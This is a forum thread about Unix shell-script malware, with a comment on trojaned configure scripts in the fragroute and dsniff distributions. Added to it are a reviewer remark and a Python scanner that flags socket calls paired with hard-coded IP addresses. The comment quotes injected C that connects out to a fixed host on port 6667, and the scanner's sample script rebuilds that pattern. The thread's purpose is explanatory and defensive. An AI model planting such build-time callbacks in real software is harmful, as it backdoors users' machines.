Unix Shell-Scripting Malware
sheriff_p writes: "Virus Bulletin are running an article on Unix shell scripting malware, citing a 'zeitgeist' of interest in *nix malware following the release of {Win32/Linux}/Simile.D.
The article looks at possible infection methods, possible actions the virus could take, and at a couple of real-world examples..."
>What about ./configure scripts?
Actually that seems to be the new trend amongst hax0rs who trojan program distributions. Recently it was reported to bugtraq that monkey.org was compromised and several programs including fragroute and dsniff were altered. Read the explanation of how that happened here.
What did the hax0rs add? A little present in the ./configure script. Among other things it creates a .c file called conftest with some interesting "checks" in it:
...
+ sa.sin_addr.s_addr = inet_addr("216.80.99.202");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa))
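Review bot: the added line `sa.sin_addr.s_addr = inet_addr("216.80.99.202");` hard-codes a remote IPv4 address in a program that the configure script generates, and the following line calls connect() on that address. A build-time feature check has no reason to open an outbound connection to a fixed host, so this change should be rejected and the distributed archive compared against a known-good copy before anyone builds from it.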
It connects to the above address on port 6667 and does some other nonsense. Then it's compiled and run. The user is none the wiser unless he takes the time to read the ENTIRE ./configure script.
You can find the full diff here.
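A defensive check for the pattern this comment describes, as an added example that is not part of the original post or of any project's tooling: it pulls each here-document out of a configure script and flags those that pair a socket call with a hard-coded IPv4 address. The sample script, the documentation address 192.0.2.10, and the names `heredocs` and `scan_configure` are constructed for illustration.

```python
import re

# Constructed sample shaped like the configure fragment described above.
# 192.0.2.10 is an RFC 5737 documentation address, not one from the report.
SAMPLE_CONFIGURE = '''#!/bin/sh
cat > conftest.c <<EOF
int main() { return 0; }
EOF
$CC -o conftest conftest.c && ./conftest
cat > conftest.c <<EOF
#include <netinet/in.h>
int main() {
  struct sockaddr_in sa;
  int s = socket(AF_INET, SOCK_STREAM, 0);
  sa.sin_port = htons(6667);
  sa.sin_addr.s_addr = inet_addr("192.0.2.10");
  return connect(s, (struct sockaddr *)&sa, sizeof(sa));
}
EOF
$CC -o conftest conftest.c && ./conftest
'''

# "<<WORD" up to a line holding only WORD; group 2 is the here-document body.
HEREDOC = re.compile(r"<<-?\s*[\"']?(\w+)[\"']?[^\n]*\n(.*?)^\s*\1\s*$", re.S | re.M)
INDICATORS = {
    "socket call": re.compile(r"\b(socket|connect|gethostbyname|getaddrinfo)\s*\("),
    "literal IPv4 address": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
}

def heredocs(script):
    """Yield (opening_line_number, body) for each here-document in a script."""
    for m in HEREDOC.finditer(script):
        yield script.count("\n", 0, m.start()) + 1, m.group(2)

def scan_configure(script):
    """Return [(line, [indicator names])] for here-documents worth reading."""
    findings = []
    for line, body in heredocs(script):
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(body))
        # A link check may name connect() alone; flag a call plus a fixed address.
        if len(hits) == len(INDICATORS):
            findings.append((line, hits))
    return findings

if __name__ == "__main__":
    for line, hits in scan_configure(SAMPLE_CONFIGURE):
        print(f"line {line}: embedded program with {', '.join(hits)}")
```

A hit is a pointer to the lines a reviewer should read, not a verdict; an address assembled at run time or a hostname lookup would need further indicators.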